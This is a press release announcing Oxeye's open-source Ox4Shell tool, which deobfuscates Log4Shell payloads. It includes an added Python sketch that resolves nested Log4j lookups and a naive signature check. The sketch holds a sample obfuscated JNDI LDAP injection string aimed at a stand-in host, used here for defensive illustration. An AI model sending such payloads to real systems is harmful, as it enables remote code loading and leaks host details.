Oxeye Launches Open Source Payload Deobfuscation Tool

Tel Aviv – January 12, 2022 – Oxeye, the technology innovator of cloud-native application security testing solutions, today launched its first 2022 open source initiative with the introduction of Ox4Shell. The powerful and free open source payload deobfuscation tool is the first in a series of solutions developed by Oxeye to help developers, AppSec professionals and the open source community. Ox4Shell is designed to combat what some call “Internet Covid”, the Log4Shell zero-day vulnerability. To counter a very effective obfuscation strategy used by malicious actors, Oxeye’s new open source tool (available on GitHub) exposes hidden payloads that are being actively used to confuse security protection tools and security teams.

As experts report, organizations around the world continue to suffer from remote code attacks and exposure of sensitive data due to the widespread Log4Shell vulnerability. Spotted in Apache’s Log4J, a logging system widely used by web and server application developers, the flaw makes it possible to inject text into log messages or log message parameters, and from there into server logs, which can then load code from remote servers for malicious purposes. Apache gives Log4Shell a CVSS severity score of 10 out of 10, the highest possible score. Researchers have since discovered similar vulnerabilities in the popular H2 database. The vulnerability is simple to execute and is estimated to affect hundreds of millions of devices.

“Log4j vulnerabilities are extremely common and affect enterprise applications, embedded systems, and their subcomponents,” said Jonathan Care, senior director analyst at Gartner. “Java-based applications, including Cisco Webex, Minecraft, and FileZilla FTP, are examples of affected programs, but this is by no means an exhaustive list. The vulnerability even affects the Mars 2020 helicopter mission Ingenuity, which utilizes Apache Log4j for event logging.”

As part of a new open source initiative for 2022, Oxeye released the first in a series of contributions aimed at enhancing security efforts by deobfuscating payloads commonly used in conjunction with Log4J exploits. Ox4Shell exposes hidden payloads and transforms them into more meaningful forms to get a clear picture of what threat actors are trying to achieve. This allows all parties involved to take immediate action and address the vulnerability.

The Log4j library has some unique lookup features that allow users to look up environment variables, Java process runtime information, and more. These enable threat actors to probe specific information that can uniquely identify the infected machines they are targeting. Ox4Shell enables you to comply with such lookup functions by providing them with mock data that you control.
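The lookup resolution described above can be sketched as follows. This is an added example, not code from Ox4Shell or Oxeye: the function names, the mock values and the sample request line are constructed for illustration, and only the `lower`, `upper`, `env`, `sys` and `:-` default forms are handled.

```python
import re

# Innermost ${...} (no braces inside), so nested lookups resolve inside-out.
INNER = re.compile(r"\$\{([^{}]*)\}")

# Constructed mock data handed to env/sys lookups instead of real host details.
MOCK = {"env": {"HOSTNAME": "mock-host", "USER": "mock-user"},
        "sys": {"java.version": "1.8.0_mock"}}

def resolve(body, mock):
    """Resolve one lookup body, e.g. 'lower:J', 'env:USER:-x' or '::-j'.
    Returns None when the lookup is not one we evaluate (such as jndi)."""
    expr, has_default, default = body.partition(":-")
    prefix, colon, key = expr.partition(":")
    if colon:
        if prefix == "lower":
            return key.lower()
        if prefix == "upper":
            return key.upper()
        if key in mock.get(prefix, {}):
            return mock[prefix][key]
    # Unknown or empty lookup: Log4j falls back to the text after ':-'.
    return default if has_default else None

def deobfuscate(text, mock=MOCK, max_passes=20):
    """Repeatedly resolve innermost lookups until the text stops changing."""
    def swap(m):
        value = resolve(m.group(1), mock)
        return m.group(0) if value is None else value
    for _ in range(max_passes):  # bounded, so hostile input cannot loop forever
        new = INNER.sub(swap, text)
        if new == text:
            break
        text = new
    return text

def has_jndi_lookup(text):
    """Naive signature that obfuscated input slips past before normalisation."""
    return "${jndi:" in text.lower()

# Constructed sample log line; example.invalid is a reserved, non-routable name.
RAW = ("GET /?q=${${lower:J}${::-n}${env:NOPE:-d}i:${lower:L}dap://"
       "example.invalid/${env:HOSTNAME}} HTTP/1.1")

if __name__ == "__main__":
    print(has_jndi_lookup(RAW), has_jndi_lookup(deobfuscate(RAW)))
    print(deobfuscate(RAW))
```

The `jndi` lookup itself is never evaluated; it is left in place so that signature matching or an analyst can see the normalised request.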

“The difficulty of applying the required patches to the Log4Shell vulnerability means that the vulnerability is leaving, and will continue to leave, a gap for malicious attacks. Unless proper remediation is applied, the ability to apply obfuscation techniques to the payload to circumvent rule logic and bypass security measures also makes this a considerable challenge. Deobfuscation is critical to understanding the attacker’s true intent. Ox4Shell provides a powerful solution to this problem, and as backers of the open source community, we’re proud to contribute and make it available through GitHub.”

Availability

Ox4Shell is generally available for free on GitHub. Oxeye invites developers and security professionals interested in learning more to visit https://www.oxeye.io/ox4shell-deobfuscate-log4shell or download the software at https://github.com/ox-eye/Ox4Shell. To schedule a personalized demonstration of the complete Oxeye Cloud Native Application Security Testing (CNAST) platform, visit https://www.oxeye.io/get-a-demo.

Resources:

– Follow @OxeyeSecurity on Twitter

– Join Oxeye on LinkedIn https://www.linkedin.com/company/oxeyeio/

– Visit Oxeye online at http://www.oxeye.io

About Oxeye

Oxeye provides cloud-native application security testing solutions designed for modern architectures. The company enables customers to identify and address the most critical code vulnerabilities as an integral part of the software development lifecycle, disrupting traditional application security testing (AST) approaches by providing context-sensitive, painless, and comprehensive solutions, ensuring no vulnerable code enters production. Purpose-built for Dev and AppSec teams, Oxeye helps move security left while speeding up development cycles, reducing friction, and eliminating risk.
